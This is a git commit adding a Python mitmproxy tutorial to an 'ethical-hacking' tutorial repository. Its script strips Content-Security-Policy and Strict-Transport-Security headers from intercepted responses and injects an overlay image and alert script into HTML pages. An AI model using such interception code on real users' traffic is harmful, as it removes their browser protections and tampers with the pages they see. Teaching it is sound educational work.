add making http proxy with mitmproxy tutorial

x4nth055 · x4nth055 · commit 1151b590ba48 · 2021-01-03T18:19:35.000+01:00
diff --git a/README.md b/README.md
@@ -31,6 +31,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Build a SQL Injection Scanner in Python](https://www.thepythoncode.com/code/sql-injection-vulnerability-detector-in-python). ([code](ethical-hacking/sql-injection-detector))
     - [How to Extract Chrome Passwords in Python](https://www.thepythoncode.com/article/extract-chrome-passwords-python). ([code](ethical-hacking/chrome-password-extractor))
     - [How to Use Shodan API in Python](https://www.thepythoncode.com/article/using-shodan-api-in-python). ([code](ethical-hacking/shodan-api))
+    - [How to Make an HTTP Proxy in Python](https://www.thepythoncode.com/article/writing-http-proxy-in-python-with-mitmproxy). ([code](ethical-hacking/http-mitm-proxy))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
diff --git a/ethical-hacking/http-mitm-proxy/README.md b/ethical-hacking/http-mitm-proxy/README.md
@@ -0,0 +1,11 @@
+# [How to Make an HTTP Proxy in Python](https://www.thepythoncode.com/article/writing-http-proxy-in-python-with-mitmproxy)
+To run this:
+- Install [mitmproxy](https://mitmproxy.org/).
+- Run the following command:
+    ```
+    $ mitmproxy --ignore '^(?!duckduckgo\.com)' -s proxy.py
+    ```
+- Test your proxy via configuring your browser or tools such as iptables (check [the tutorial](https://www.thepythoncode.com/article/writing-http-proxy-in-python-with-mitmproxy) for more info), or you can test it out with `curl`:
+    ```
+    $ curl -x http://127.0.0.1:8080/ -k https://duckduckgo.com/
+    ```
diff --git a/ethical-hacking/http-mitm-proxy/proxy.py b/ethical-hacking/http-mitm-proxy/proxy.py
@@ -0,0 +1,19 @@
+OVERLAY_HTML = b"<img style='z-index:10000;width:100%;height:100%;top:0;left:0;position:fixed;opacity:0.5' src='https://cdn.winknews.com/wp-content/uploads/2019/01/Police-lights.-Photo-via-CBS-News..jpg' />"
+OVERLAY_JS = b"<script>alert('You can\'t click anything on this page');</script>"
+
+def remove_header(response, header_name):
+    if header_name in response.headers:
+        del response.headers[header_name]
+
+
+def response(flow):
+    # remove security headers in case they're present
+    remove_header(flow.response, "Content-Security-Policy")
+    remove_header(flow.response, "Strict-Transport-Security")
+    # if content-type type isn't available, ignore
+    if "content-type" not in flow.response.headers:
+        return
+    # if it's HTML & response code is 200 OK, then inject the overlay snippet (HTML & JS)
+    if "text/html" in flow.response.headers["content-type"] and flow.response.status_code == 200:
+        flow.response.content += OVERLAY_HTML
+        flow.response.content += OVERLAY_JS
